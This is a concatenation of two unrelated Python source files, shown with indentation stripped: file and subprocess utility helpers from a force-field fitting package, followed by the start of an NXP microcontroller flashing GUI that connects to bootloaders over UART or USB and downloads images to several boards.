# 3) If list is still empty and err==True, then crash with an error.
def onefile(fnm=None, ext=None, err=False):
if fnm is None and ext is None:
if err:
logger.error("Must provide either filename or extension to onefile()")
raise RuntimeError
else:
return None
if fnm is not None:
if os.path.exists(fnm):
if os.path.dirname(os.path.abspath(fnm)) != os.getcwd():
fsrc = os.path.abspath(fnm)
fdest = os.path.join(os.getcwd(), os.path.basename(fnm))
#-----
# If the file path doesn't correspond to the current directory, copy the file over
# If the file exists in the current directory already and it's different, then crash.
#-----
if os.path.exists(fdest):
if not filecmp.cmp(fsrc, fdest):
logger.error("onefile() will not overwrite %s with %s\n" % (os.path.join(os.getcwd(), os.path.basename(fnm)),os.path.abspath(fnm)))
raise RuntimeError
else:
logger.info("\x1b[93monefile() says the files %s and %s are identical\x1b[0m\n" % (os.path.abspath(fnm), os.getcwd()))
else:
logger.info("\x1b[93monefile() will copy %s to %s\x1b[0m\n" % (os.path.abspath(fnm), os.getcwd()))
shutil.copy2(fsrc, fdest)
return os.path.basename(fnm)
elif err==True or ext is None:
logger.error("File specified by %s does not exist!" % fnm)
raise RuntimeError
elif ext is not None:
warn_once("File specified by %s does not exist - will try to autodetect .%s extension" % (fnm, ext))
answer = None
cwd = os.getcwd()
ls = [i for i in os.listdir(cwd) if i.endswith('.%s' % ext)]
if len(ls) != 1:
if err:
logger.error("Cannot find a unique file with extension .%s in %s (%i found; %s)" % (ext, cwd, len(ls), ' '.join(ls)))
raise RuntimeError
else:
warn_once("Cannot find a unique file with extension .%s in %s (%i found; %s)" %
(ext, cwd, len(ls), ' '.join(ls)), warnhash = "Found %i .%s files" % (len(ls), ext))
else:
answer = os.path.basename(ls[0])
warn_once("Autodetected %s in %s" % (answer, cwd), warnhash = "Autodetected %s" % answer)
return answer
# Purpose: Given a file name / file list and/or an extension, do one of the following:
# 1) If provided a file list, check each file in the list
# and crash if any file does not exist. Return the list.
# 2) If provided a file name, check the file and crash if the file
# does not exist. Return a length-one list with the file name.
# 3) If list is empty but extension is provided, check for files that
# match the extension. If so, append them to the list.
# 4) If list is still empty and err==True, then crash with an error.
def listfiles(fnms=None, ext=None, err=False, dnm=None):
answer = []
cwd = os.path.abspath(os.getcwd())
if dnm is not None:
os.chdir(dnm)
if isinstance(fnms, list):
for i in fnms:
if not os.path.exists(i):
logger.error('Specified %s but it does not exist' % i)
raise RuntimeError
answer.append(i)
elif isinstance(fnms, six.string_types):
if not os.path.exists(fnms):
logger.error('Specified %s but it does not exist' % fnms)
raise RuntimeError
answer = [fnms]
elif fnms is not None:
print(fnms)
logger.error('First argument to listfiles must be a list, a string, or None')
raise RuntimeError
if answer == [] and ext is not None:
answer = [os.path.basename(i) for i in os.listdir(os.getcwd()) if i.endswith('.%s' % ext)]
if answer == [] and err:
logger.error('listfiles function failed to come up with a file! (fnms = %s ext = %s)' % (str(fnms), str(ext)))
raise RuntimeError
for ifnm, fnm in enumerate(answer):
if os.path.dirname(os.path.abspath(fnm)) != os.getcwd():
fsrc = os.path.abspath(fnm)
fdest = os.path.join(os.getcwd(), os.path.basename(fnm))
#-----
# If the file path doesn't correspond to the current directory, copy the file over
# If the file exists in the current directory already and it's different, then crash.
#-----
if os.path.exists(fdest):
if not filecmp.cmp(fsrc, fdest):
logger.error("onefile() will not overwrite %s with %s\n" % (os.path.join(os.getcwd(), os.path.basename(fnm)),os.path.abspath(fnm)))
raise RuntimeError
else:
logger.info("\x1b[93monefile() says the files %s and %s are identical\x1b[0m\n" % (os.path.abspath(fnm), os.getcwd()))
answer[ifnm] = os.path.basename(fnm)
else:
logger.info("\x1b[93monefile() will copy %s to %s\x1b[0m\n" % (os.path.abspath(fnm), os.getcwd()))
shutil.copy2(fsrc, fdest)
answer[ifnm] = os.path.basename(fnm)
os.chdir(cwd)
return answer
def extract_tar(tarfnm, fnms, force=False):
"""
Extract a list of files from .tar archive with any compression.
The file is extracted to the base folder of the archive.
Parameters
----------
tarfnm :
Name of the archive file.
fnms : str or list
File names to be extracted.
force : bool, optional
If true, then force extraction of file even if they already exist on disk.
"""
# Get path of tar file.
fdir = os.path.abspath(os.path.dirname(tarfnm))
# If all files exist, then return - no need to extract.
if (not force) and all([os.path.exists(os.path.join(fdir, f)) for f in fnms]): return
# If the tar file doesn't exist or isn't valid, do nothing.
if not os.path.exists(tarfnm): return
if not tarfile.is_tarfile(tarfnm): return
# Check type of fnms argument.
if isinstance(fnms, six.string_types): fnms = [fnms]
# Load the tar file.
arch = tarfile.open(tarfnm, 'r')
# Extract only the files we have (to avoid an exception).
all_members = arch.getmembers()
all_names = [f.name for f in all_members]
members = [f for f in all_members if f.name in fnms]
# Extract files to the destination.
arch.extractall(fdir, members=members)
def GoInto(Dir):
if os.path.exists(Dir):
if os.path.isdir(Dir): pass
else:
logger.error("Tried to create directory %s, it exists but isn't a directory\n" % newdir)
raise RuntimeError
else:
os.makedirs(Dir)
os.chdir(Dir)
def allsplit(Dir):
# Split a directory into all directories involved.
s = os.path.split(os.path.normpath(Dir))
if s[1] == '' or s[1] == '.' : return []
return allsplit(s[0]) + [s[1]]
def Leave(Dir):
if os.path.split(os.getcwd())[1] != Dir:
logger.error("Trying to leave directory %s, but we're actually in directory %s (check your code)\n" % (Dir,os.path.split(os.getcwd())[1]))
raise RuntimeError
for i in range(len(allsplit(Dir))):
os.chdir('..')
# Dictionary containing specific error messages for specific missing files or file patterns
specific_lst = [(['mdrun','grompp','trjconv','g_energy','g_traj'], "Make sure to install GROMACS and add it to your path (or set the gmxpath option)"),
(['force.mdin', 'stage.leap'], "This file is needed for setting up AMBER force matching targets"),
(['conf.pdb', 'mono.pdb'], "This file is needed for setting up OpenMM condensed phase property targets"),
(['liquid.xyz', 'liquid.key', 'mono.xyz', 'mono.key'], "This file is needed for setting up OpenMM condensed phase property targets"),
(['dynamic', 'analyze', 'minimize', 'testgrad', 'vibrate', 'optimize', 'polarize', 'superpose'], "Make sure to install TINKER and add it to your path (or set the tinkerpath option)"),
(['runcuda.sh', 'npt.py', 'npt_tinker.py'], "This file belongs in the ForceBalance source directory, not sure why it is missing"),
(['input.xyz'], "This file is needed for TINKER molecular property targets"),
(['.*key$', '.*xyz$'], "I am guessing this file is probably needed by TINKER"),
(['.*gro$', '.*top$', '.*itp$', '.*mdp$', '.*ndx$'], "I am guessing this file is probably needed by GROMACS")
]
# Build a dictionary mapping all of the keys in the above lists to their error messages
specific_dct = dict(list(itertools.chain(*[[(j,i[1]) for j in i[0]] for i in specific_lst])))
def MissingFileInspection(fnm):
fnm = os.path.split(fnm)[1]
answer = ""
for key in specific_dct:
if answer == "":
answer += "\n"
if re.match(key, fnm):
answer += "%s\n" % specific_dct[key]
return answer
def wopen(dest, binary=False):
""" If trying to write to a symbolic link, remove it first. """
if os.path.islink(dest):
logger.warn("Trying to write to a symbolic link %s, removing it first\n" % dest)
os.unlink(dest)
if binary:
return open(dest,'wb')
else:
return open(dest,'w')
def LinkFile(src, dest, nosrcok = False):
if os.path.abspath(src) == os.path.abspath(dest): return
if os.path.exists(src):
# Remove broken link
if os.path.islink(dest) and not os.path.exists(dest):
os.remove(dest)
os.symlink(src, dest)
elif os.path.exists(dest):
if os.path.islink(dest): pass
else:
logger.error("Tried to create symbolic link %s to %s, destination exists but isn't a symbolic link\n" % (src, dest))
raise RuntimeError
else:
os.symlink(src, dest)
else:
if not nosrcok:
logger.error("Tried to create symbolic link %s to %s, but source file doesn't exist%s\n" % (src,dest,MissingFileInspection(src)))
raise RuntimeError
def CopyFile(src, dest):
if os.path.exists(src):
if os.path.exists(dest):
if os.path.islink(dest):
logger.error("Tried to copy %s to %s, destination exists but it's a symbolic link\n" % (src, dest))
raise RuntimeError
else:
shutil.copy2(src, dest)
else:
logger.error("Tried to copy %s to %s, but source file doesn't exist%s\n" % (src,dest,MissingFileInspection(src)))
raise RuntimeError
def link_dir_contents(abssrcdir, absdestdir):
for fnm in os.listdir(abssrcdir):
srcfnm = os.path.join(abssrcdir, fnm)
destfnm = os.path.join(absdestdir, fnm)
if os.path.islink(destfnm) and not os.path.exists(destfnm):
os.remove(destfnm)
if os.path.isfile(srcfnm) or (os.path.isdir(srcfnm) and fnm == 'IC'):
if not os.path.exists(destfnm):
#print "Linking %s to %s" % (srcfnm, destfnm)
os.symlink(srcfnm, destfnm)
def remove_if_exists(fnm):
""" Remove the file if it exists (doesn't return an error). """
if os.path.exists(fnm):
os.remove(fnm)
def which(fnm):
# Get the location of a file. Works only on UNIX-like file systems.
try:
return os.path.split(os.popen('which %s 2> /dev/null' % fnm).readlines()[0].strip())[0]
except:
return ''
# Thanks to cesarkawakami on #python (IRC freenode) for this code.
class LineChunker(object):
def __init__(self, callback):
self.callback = callback
self.buf = ""
def push(self, data):
# Added by LPW during Py3 compatibility; ran into some trouble decoding strings such as
# "a" with umlaut on top. I guess we can ignore these for now. For some reason,
# Py2 never required decoding of data, I can simply add it to the wtring.
# self.buf += data # Old Py2 code...
self.buf += data.decode('utf-8')#errors='ignore')
self.nomnom()
def close(self):
if self.buf:
self.callback(self.buf + "\n")
def nomnom(self):
# Splits buffer by new line or carriage return, and passes
# the splitted results onto processing.
while "\n" in self.buf or "\r" in self.buf:
chunk, sep, self.buf = re.split(r"(\r|\n)", self.buf, maxsplit=1)
self.callback(chunk + sep)
def __enter__(self):
return self
def __exit__(self, *args, **kwargs):
self.close()
def _exec(command, print_to_screen = False, outfnm = None, logfnm = None, stdin = "", print_command = True, copy_stdout = True, copy_stderr = False, persist = False, expand_cr=False, print_error=True, rbytes=1, cwd=None, **kwargs):
"""Runs command line using subprocess, optionally returning stdout.
Options:
command (required) = Name of the command you want to execute
outfnm (optional) = Name of the output file name (overwritten if exists)
logfnm (optional) = Name of the log file name (appended if exists)
stdin (optional) = A string to be passed to stdin, as if it were typed (use newline character to mimic Enter key)
print_command = Whether to print the command.
copy_stdout = Copy the stdout stream; can set to False in strange situations
copy_stderr = Copy the stderr stream to the stdout stream; useful for GROMACS which prints out everything to stderr (argh.)
expand_cr = Whether to expand carriage returns into newlines (useful for GROMACS mdrun).
print_error = Whether to print error messages on a crash. Should be true most of the time.
persist = Continue execution even if the command gives a nonzero return code.
rbytes = Number of bytes to read from stdout and stderr streams at a time. GMX requires rbytes = 1 otherwise streams are interleaved. Higher values for speed.
"""
# Dictionary of options to be passed to the Popen object.
cmd_options={'shell':isinstance(command, six.string_types), 'stdin':PIPE, 'stdout':PIPE, 'stderr':PIPE, 'universal_newlines':expand_cr, 'cwd':cwd}
# If the current working directory is provided, the outputs will be written to there as well.
if cwd is not None:
if outfnm is not None:
outfnm = os.path.abspath(os.path.join(cwd, outfnm))
if logfnm is not None:
logfnm = os.path.abspath(os.path.join(cwd, logfnm))
# "write to file" : Function for writing some characters to the log and/or output files.
def wtf(out):
if logfnm is not None:
with open(logfnm,'ab+') as f:
f.write(out.encode('utf-8'))
f.flush()
if outfnm is not None:
with open(outfnm,'wb+' if wtf.first else 'ab+') as f:
f.write(out.encode('utf-8'))
f.flush()
wtf.first = False
wtf.first = True
# Preserve backwards compatibility; sometimes None gets passed to stdin.
if stdin is None: stdin = ""
if print_command:
logger.info("Executing process: \x1b[92m%-50s\x1b[0m%s%s%s%s\n" % (' '.join(command) if type(command) is list else command,
" In: %s" % cwd if cwd is not None else "",
" Output: %s" % outfnm if outfnm is not None else "",
" Append: %s" % logfnm if logfnm is not None else "",
(" Stdin: %s" % stdin.replace('\n','\\n')) if stdin else ""))
wtf("Executing process: %s%s\n" % (command, (" Stdin: %s" % stdin.replace('\n','\\n')) if stdin else ""))
cmd_options.update(kwargs)
p = subprocess.Popen(command, **cmd_options)
# Write the stdin stream to the process.
p.stdin.write(stdin.encode('ascii'))
p.stdin.close()
#===============================================================#
#| Read the output streams from the process. This is a bit |#
#| complicated because programs like GROMACS tend to print out |#
#| stdout as well as stderr streams, and also carriage returns |#
#| along with newline characters. |#
#===============================================================#
# stdout and stderr streams of the process.
streams = [p.stdout, p.stderr]
# These are functions that take chunks of lines (read) as inputs.
def process_out(read):
if print_to_screen: sys.stdout.write(str(read.encode('utf-8')))
if copy_stdout:
process_out.stdout.append(read)
wtf(read)
process_out.stdout = []
def process_err(read):
if print_to_screen: sys.stderr.write(str(read.encode('utf-8')))
process_err.stderr.append(read)
if copy_stderr:
process_out.stdout.append(read)
wtf(read)
process_err.stderr = []
# This reads the streams one byte at a time, and passes it to the LineChunker
# which splits it by either newline or carriage return.
# If the stream has ended, then it is removed from the list.
with LineChunker(process_out) as out_chunker, LineChunker(process_err) as err_chunker:
while True:
to_read, _, _ = select(streams, [], [])
for fh in to_read:
if fh is p.stdout:
read_nbytes = 0
read = ''.encode('utf-8')
while True:
if read_nbytes == 0:
read += fh.read(rbytes)
read_nbytes += rbytes
else:
read += fh.read(1)
read_nbytes += 1
if read_nbytes > 10+rbytes:
raise RuntimeError("Failed to decode stdout from external process.")
if not read:
streams.remove(p.stdout)
p.stdout.close()
break
else:
try:
out_chunker.push(read)
break
except UnicodeDecodeError:
pass
elif fh is p.stderr:
read_nbytes = 0
read = ''.encode('utf-8')
while True:
if read_nbytes == 0:
read += fh.read(rbytes)
read_nbytes += rbytes
else:
read += fh.read(1)
read_nbytes += 1
if read_nbytes > 10+rbytes:
raise RuntimeError("Failed to decode stderr from external process.")
if not read:
streams.remove(p.stderr)
p.stderr.close()
break
else:
try:
err_chunker.push(read)
break
except UnicodeDecodeError:
pass
else:
raise RuntimeError
if len(streams) == 0: break
p.wait()
process_out.stdout = ''.join(process_out.stdout)
process_err.stderr = ''.join(process_err.stderr)
_exec.returncode = p.returncode
if p.returncode != 0:
if process_err.stderr and print_error:
logger.warning("Received an error message:\n")
logger.warning("\n[====] \x1b[91mError Message\x1b[0m [====]\n")
logger.warning(process_err.stderr)
logger.warning("[====] \x1b[91mEnd o'Message\x1b[0m [====]\n")
if persist:
if print_error:
logger.info("%s gave a return code of %i (it may have crashed) -- carrying on\n" % (command, p.returncode))
else:
# This code (commented out) would not throw an exception, but instead exit with the returncode of the crashed program.
# sys.stderr.write("\x1b[1;94m%s\x1b[0m gave a return code of %i (\x1b[91mit may have crashed\x1b[0m)\n" % (command, p.returncode))
# sys.exit(p.returncode)
logger.error("\x1b[1;94m%s\x1b[0m gave a return code of %i (\x1b[91mit may have crashed\x1b[0m)\n\n" % (command, p.returncode))
raise RuntimeError
# Return the output in the form of a list of lines, so we can loop over it using "for line in output".
Out = process_out.stdout.split('\n')
if Out[-1] == '':
Out = Out[:-1]
return Out
_exec.returncode = None
def warn_press_key(warning, timeout=10):
logger.warning(warning + '\n')
if sys.stdin.isatty():
logger.warning("\x1b[1;91mPress Enter or wait %i seconds (I assume no responsibility for what happens after this!)\x1b[0m\n" % timeout)
try:
rlist, wlist, xlist = select([sys.stdin], [], [], timeout)
if rlist:
sys.stdin.readline()
except: pass
def warn_once(warning, warnhash = None):
""" Prints a warning but will only do so once in a given run. """
if warnhash is None:
warnhash = warning
if warnhash in warn_once.already:
return
warn_once.already.add(warnhash)
if type(warning) is str:
logger.info(warning + '\n')
elif type(warning) is list:
for line in warning:
logger.info(line + '\n')
warn_once.already = set()
#=========================================#
#| Development stuff (not commonly used) |#
#=========================================#
def concurrent_map(func, data):
"""
Similar to the bultin function map(). But spawn a thread for each argument
and apply `func` concurrently.
Note: unlike map(), we cannot take an iterable argument. `data` should be an
indexable sequence.
"""
N = len(data)
result = [None] * N
# wrapper to dispose the result in the right slot
def task_wrapper(i):
result[i] = func(data[i])
threads = [threading.Thread(target=task_wrapper, args=(i,)) for i in range(N)]
for t in threads:
t.start()
for t in threads:
t.join()
return result
|
main.py
|
#! /usr/bin/env python
# -*- coding: UTF-8 -*-
# Copyright 2021 NXP
# All rights reserved.
#
# SPDX-License-Identifier: BSD-3-Clause
import wx
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
import os
import time
import threading
import inspect
import ctypes
from run import runcore
from ui import uidef
from ui import uilang
g_main_win = None
g_task_detectUsbhid = None
g_task_uartAllInOneAction = [None] * uidef.kMaxMfgBoards
g_task_usbAllInOneAction = [None] * uidef.kMaxMfgBoards
g_task_increaseGauge = None
g_uartAutoDownloadResult_success = [0] * uidef.kMaxMfgBoards
g_uartAutoDownloadResult_total = [0] * uidef.kMaxMfgBoards
g_usbAutoDownloadResult_success = [0] * uidef.kMaxMfgBoards
g_usbAutoDownloadResult_total = [0] * uidef.kMaxMfgBoards
kRetryPingTimes = 5
kBootloaderType_Rom = 0
kBootloaderType_Flashloader = 1
def _async_raise(tid, exctype):
tid = ctypes.c_long(tid)
if not inspect.isclass(exctype):
exctype = type(exctype)
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exctype))
if res == 0:
raise ValueError("invalid thread id")
elif res != 1:
ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)
raise SystemError("PyThreadState_SetAsyncExc failed")
class flashMain(runcore.flashRun):
def __init__(self, parent):
runcore.flashRun.__init__(self, parent)
self.lastTime = None
self.isUartAllInOneActionTaskPending = [False] * uidef.kMaxMfgBoards
self.isUsbAllInOneActionTaskPending = [False] * uidef.kMaxMfgBoards
def _startGaugeTimer( self ):
self.lastTime = time.time()
self.initGauge()
def _stopGaugeTimer( self ):
self.deinitGauge()
self.updateCostTime()
def callbackSetMcuDevice( self, event ):
self.setTargetSetupValue()
self.createMcuTarget()
self._setUartUsbPort()
def callbackSetConnectedBoards( self, event ):
self.setMcuBoards()
def callbackSwitchSerialPortIndex( self, event ):
self.setSerialPortIndex()
def _setUartUsbPort( self, deviceIndex=0 ):
usbIdList = self.getUsbid()
retryToDetectUsb = False
self.setPortSetupValue(deviceIndex, self.connectStage[deviceIndex], usbIdList, retryToDetectUsb )
def callbackSetUartPort( self, event ):
self._setUartUsbPort()
def callbackSetUsbhidPort( self, event ):
self._setUartUsbPort()
def callbackSetPortVid( self, event ):
self.updatePortSetupValue()
def callbackSetBaudPid( self, event ):
self.updatePortSetupValue()
def _retryToPingBootloader( self, bootType, deviceIndex=0 ):
pingStatus = False
pingCnt = kRetryPingTimes
while (not pingStatus) and pingCnt > 0:
if bootType == kBootloaderType_Rom:
pingStatus = self.pingRom(deviceIndex)
elif bootType == kBootloaderType_Flashloader:
# This is mainly for RT1170 flashloader, but it is also ok for other RT devices
if self.isUartPortSelected:
time.sleep(3)
if self.usbDevicePath[deviceIndex]['flashloader'] != None:
self.connectToDevice(self.connectStage[deviceIndex], deviceIndex)
pingStatus = self.pingFlashloader(deviceIndex)
else:
pass
if pingStatus:
break
pingCnt = pingCnt - 1
time.sleep(2)
return pingStatus
def _doubleCheckBootModeError( self ):
if (self.mcuSeries == uidef.kMcuSeries_iMXRT10yy) or \
(self.mcuSeries == uidef.kMcuSeries_iMXRT11yy):
self.setInfoStatus(uilang.kMsgLanguageContentDict['connectError_doubleCheckBmod'][self.languageIndex])
elif (self.mcuSeries == uidef.kMcuSeries_iMXRTxxx):
self.setInfoStatus(uilang.kMsgLanguageContentDict['connectError_doubleCheckIsp'][self.languageIndex])
elif (self.mcuSeries == uidef.kMcuSeries_LPC):
self.setInfoStatus(uilang.kMsgLanguageContentDict['connectError_doubleCheckIspBoot'][self.languageIndex])
elif (self.mcuSeries == uidef.kMcuSeries_Kinetis):
self.setInfoStatus(uilang.kMsgLanguageContentDict['connectError_doubleCheckFopt'][self.languageIndex])
else:
pass
def _connectFailureHandler( self, deviceIndex=0 ):
self.connectStage[deviceIndex] = uidef.kConnectStage_Rom
self.updateConnectStatus('red')
usbIdList = self.getUsbid()
self.setPortSetupValue(deviceIndex, self.connectStage[deviceIndex], usbIdList, False )
self.setInfoStatus(uilang.kMsgLanguageContentDict['connectError_checkUsbCable'][self.languageIndex])
def _connectStateMachine( self, deviceIndex=0 ):
retryToDetectUsb = False
connectSteps = 0
if (self.mcuSeries == uidef.kMcuSeries_iMXRT10yy) or \
(self.mcuSeries == uidef.kMcuSeries_iMXRT11yy):
connectSteps = 3
if (self.mcuSeries == uidef.kMcuSeries_iMXRTxxx) or \
(self.mcuSeries == uidef.kMcuSeries_LPC) or \
(self.mcuSeries == uidef.kMcuSeries_Kinetis):
connectSteps = 2
else:
pass
isConnectionFailureOnce = False
while connectSteps:
if not self.updatePortSetupValue(deviceIndex, retryToDetectUsb):
self._connectFailureHandler(deviceIndex)
if not isConnectionFailureOnce:
isConnectionFailureOnce = True
continue
else:
return False
if self.connectStage[deviceIndex] == uidef.kConnectStage_Rom:
self.connectToDevice(self.connectStage[deviceIndex], deviceIndex)
if self._retryToPingBootloader(kBootloaderType_Rom, deviceIndex):
if (self.mcuSeries == uidef.kMcuSeries_iMXRT10yy) or \
(self.mcuSeries == uidef.kMcuSeries_iMXRT11yy):
self.getMcuDeviceHabStatus(deviceIndex)
if self.jumpToFlashloader(deviceIndex):
self.connectStage[deviceIndex] = uidef.kConnectStage_Flashloader
usbIdList = self.getUsbid()
self.setPortSetupValue(deviceIndex, self.connectStage[deviceIndex], usbIdList, True )
else:
self.updateConnectStatus('red')
self.setInfoStatus(uilang.kMsgLanguageContentDict['connectError_failToJumpToFl'][self.languageIndex])
return False
elif (self.mcuSeries == uidef.kMcuSeries_iMXRTxxx) or \
(self.mcuSeries == uidef.kMcuSeries_LPC) or \
(self.mcuSeries == uidef.kMcuSeries_Kinetis):
self.updateConnectStatus('green')
self.connectStage[deviceIndex] = uidef.kConnectStage_Ready
else:
pass
else:
self.updateConnectStatus('red')
self._doubleCheckBootModeError()
return False
elif self.connectStage[deviceIndex] == uidef.kConnectStage_Flashloader:
self.connectToDevice(self.connectStage[deviceIndex], deviceIndex)
if self._retryToPingBootloader(kBootloaderType_Flashloader, deviceIndex):
self.updateConnectStatus('green')
self.connectStage[deviceIndex] = uidef.kConnectStage_Ready
else:
self.setInfoStatus(uilang.kMsgLanguageContentDict['connectError_failToPingFl'][self.languageIndex])
self._connectFailureHandler(deviceIndex)
return False
elif self.connectStage[deviceIndex] == uidef.kConnectStage_Ready:
if connectSteps == 1:
self.setInfoStatus(uilang.kMsgLanguageContentDict['connectInfo_readyForDownload'][self.languageIndex])
return True
else:
if self._retryToPingBootloader(kBootloaderType_Flashloader, deviceIndex):
self.setInfoStatus(uilang.kMsgLanguageContentDict['connectInfo_readyForDownload'][self.languageIndex])
return True
else:
self.connectStage[deviceIndex] = uidef.kConnectStage_Rom
connectSteps += 1
else:
pass
connectSteps -= 1
def _updateDownloadOperationResults( self ):
autoDownloadResult_success = None
success = 0
autoDownloadResult_total = None
total = 0
if self.isUartPortSelected:
autoDownloadResult_success = g_uartAutoDownloadResult_success
autoDownloadResult_total = g_uartAutoDownloadResult_total
elif self.isUsbhidPortSelected:
autoDownloadResult_success = g_usbAutoDownloadResult_success
autoDownloadResult_total = g_usbAutoDownloadResult_total
else:
pass
for i in range(uidef.kMaxMfgBoards):
success = success + autoDownloadResult_success[i]
total = total + autoDownloadResult_total[i]
self.setDownloadOperationResults(total, success)
def _doUartxAllInOneAction( self, deviceIndex=0 ):
while True:
if self.isUartAllInOneActionTaskPending[deviceIndex]:
self._doUartAllInOneAction(deviceIndex)
self.isUartAllInOneActionTaskPending[deviceIndex] = False
if (deviceIndex == 0):
self._stopGaugeTimer()
else:
if (deviceIndex != 0):
try:
if self.uartComPort[deviceIndex] != None:
self.writeDebugLog("Entering task_doUartxAllInOneAction(), Set Pending flag " + str(deviceIndex) + ", uart path is " + self.uartComPort[deviceIndex])
self.isUartAllInOneActionTaskPending[deviceIndex] = True
global g_uartAutoDownloadResult_success
global g_uartAutoDownloadResult_total
self.updateSlotStatus(deviceIndex, 'green', g_uartAutoDownloadResult_success[deviceIndex], g_uartAutoDownloadResult_total[deviceIndex])
else:
pass
except:
pass
time.sleep(1)
def task_doUart0AllInOneAction( self ):
self._doUartxAllInOneAction(0)
def task_doUart1AllInOneAction( self ):
self._doUartxAllInOneAction(1)
def task_doUart2AllInOneAction( self ):
self._doUartxAllInOneAction(2)
def task_doUart3AllInOneAction( self ):
self._doUartxAllInOneAction(3)
def task_doUart4AllInOneAction( self ):
self._doUartxAllInOneAction(4)
def task_doUart5AllInOneAction( self ):
self._doUartxAllInOneAction(5)
def task_doUart6AllInOneAction( self ):
self._doUartxAllInOneAction(6)
def task_doUart7AllInOneAction( self ):
self._doUartxAllInOneAction(7)
def _doUartAllInOneAction( self, deviceIndex=0 ):
global g_uartAutoDownloadResult_success
global g_uartAutoDownloadResult_total
if len(self.sbAppFiles) == 0:
self.updateConnectStatus('red')
self.setInfoStatus(uilang.kMsgLanguageContentDict['downloadError_notValidImage'][self.languageIndex])
return
successes = 0
g_uartAutoDownloadResult_total[deviceIndex] += 1
if self._connectStateMachine(deviceIndex):
for i in range(len(self.sbAppFiles)):
if self.flashSbImage(self.sbAppFiles[i], deviceIndex):
if i == len(self.sbAppFiles) - 1:
successes = 1
g_uartAutoDownloadResult_success[deviceIndex] += 1
self.updateSlotStatus(deviceIndex, 'blue', g_uartAutoDownloadResult_success[deviceIndex], g_uartAutoDownloadResult_total[deviceIndex])
self.updateConnectStatus('blue')
self.setInfoStatus(uilang.kMsgLanguageContentDict['downloadInfo_success'][self.languageIndex])
else:
self.updateConnectStatus('red')
self.writeInfoLog("Slot " + str(deviceIndex) + " failure:" + str(g_uartAutoDownloadResult_total[deviceIndex]))
self.updateSlotStatus(deviceIndex, 'red', g_uartAutoDownloadResult_success[deviceIndex], g_uartAutoDownloadResult_total[deviceIndex])
break
self.resetMcuDevice(deviceIndex)
time.sleep(2)
else:
self.writeInfoLog("Slot " + str(deviceIndex) + " failure: " + str(g_uartAutoDownloadResult_total[deviceIndex]))
self.updateSlotStatus(deviceIndex, 'red', g_uartAutoDownloadResult_success[deviceIndex], g_uartAutoDownloadResult_total[deviceIndex])
self.connectStage[deviceIndex] = uidef.kConnectStage_Rom
self._setUartUsbPort(deviceIndex)
self.updateConnectStatus('black')
self.setDownloadOperationResults(1, successes)
# Back to set gray color for slot button
time.sleep(0.5)
self.updateSlotStatus(deviceIndex, 'gray', g_uartAutoDownloadResult_success[deviceIndex], g_uartAutoDownloadResult_total[deviceIndex])
def _doUsbxAllInOneAction( self, deviceIndex=0 ):
while True:
if self.isUsbAllInOneActionTaskPending[deviceIndex]:
self._doUsbAutoAllInOneAction(deviceIndex)
self.isUsbAllInOneActionTaskPending[deviceIndex] = False
if (deviceIndex == 0) and (not self.isDymaticUsbDetection):
self._stopGaugeTimer()
else:
if ((deviceIndex == 0) and self.isDymaticUsbDetection) or \
(deviceIndex != 0):
try:
if self.usbDevicePath[deviceIndex]['rom'] != None:
self.writeDebugLog("Entering task_doUsbxAllInOneAction(), Set Pending flag " + str(deviceIndex) + ", usb path is " + self.usbDevicePath[deviceIndex]['rom'])
self.isUsbAllInOneActionTaskPending[deviceIndex] = True
global g_usbAutoDownloadResult_success
global g_usbAutoDownloadResult_total
self.updateSlotStatus(deviceIndex, 'green', g_usbAutoDownloadResult_success[deviceIndex], g_usbAutoDownloadResult_total[deviceIndex])
else:
pass
except:
pass
time.sleep(1)
def task_doUsb0AllInOneAction( self ):
self._doUsbxAllInOneAction(0)
def task_doUsb1AllInOneAction( self ):
self._doUsbxAllInOneAction(1)
def task_doUsb2AllInOneAction( self ):
self._doUsbxAllInOneAction(2)
def task_doUsb3AllInOneAction( self ):
self._doUsbxAllInOneAction(3)
def task_doUsb4AllInOneAction( self ):
self._doUsbxAllInOneAction(4)
def task_doUsb5AllInOneAction( self ):
self._doUsbxAllInOneAction(5)
def task_doUsb6AllInOneAction( self ):
self._doUsbxAllInOneAction(6)
def task_doUsb7AllInOneAction( self ):
self._doUsbxAllInOneAction(7)
def _doUsbAutoAllInOneAction( self, deviceIndex=0 ):
global g_usbAutoDownloadResult_success
global g_usbAutoDownloadResult_total
if len(self.sbAppFiles) == 0:
self.updateConnectStatus('red')
if not self.isDymaticUsbDetection:
self.setInfoStatus(uilang.kMsgLanguageContentDict['downloadError_notValidImage'][self.languageIndex])
return
successes = 0
g_usbAutoDownloadResult_total[deviceIndex] += 1
if self._connectStateMachine(deviceIndex):
for i in range(len(self.sbAppFiles)):
if self.flashSbImage(self.sbAppFiles[i], deviceIndex):
if i == len(self.sbAppFiles) - 1:
successes = 1
g_usbAutoDownloadResult_success[deviceIndex] += 1
self.updateSlotStatus(deviceIndex, 'blue', g_usbAutoDownloadResult_success[deviceIndex], g_usbAutoDownloadResult_total[deviceIndex])
self.updateConnectStatus('blue')
if not self.isDymaticUsbDetection:
self.setInfoStatus(uilang.kMsgLanguageContentDict['downloadInfo_success'][self.languageIndex])
else:
self.updateConnectStatus('red')
self.writeInfoLog("Slot " + str(deviceIndex) + " failure:" + str(g_usbAutoDownloadResult_total[deviceIndex]))
self.updateSlotStatus(deviceIndex, 'red', g_usbAutoDownloadResult_success[deviceIndex], g_usbAutoDownloadResult_total[deviceIndex])
break
if not self.isDymaticUsbDetection:
self.resetMcuDevice(deviceIndex)
time.sleep(2)
else:
self.waitForUsbhidDeviceDisconnect(deviceIndex)
else:
self.writeInfoLog("Slot " + str(deviceIndex) + " failure: " + str(g_usbAutoDownloadResult_total[deviceIndex]))
self.updateSlotStatus(deviceIndex, 'red', g_usbAutoDownloadResult_success[deviceIndex], g_usbAutoDownloadResult_total[deviceIndex])
self.connectStage[deviceIndex] = uidef.kConnectStage_Rom
self._setUartUsbPort(deviceIndex)
self.isUsbhidConnected[deviceIndex] = False
if self.isDymaticUsbDetection:
self.usbDevicePath[deviceIndex]['rom'] = None
self._updateDownloadOperationResults()
# Never clear 'flashloader' here, it will be used to help insert usb device
#self.usbDevicePath[deviceIndex]['flashloader'] = None
else:
self.updateConnectStatus('black')
self.setDownloadOperationResults(1, successes)
self.initUsbDevicePath()
# Back to set gray color for slot button
time.sleep(0.5)
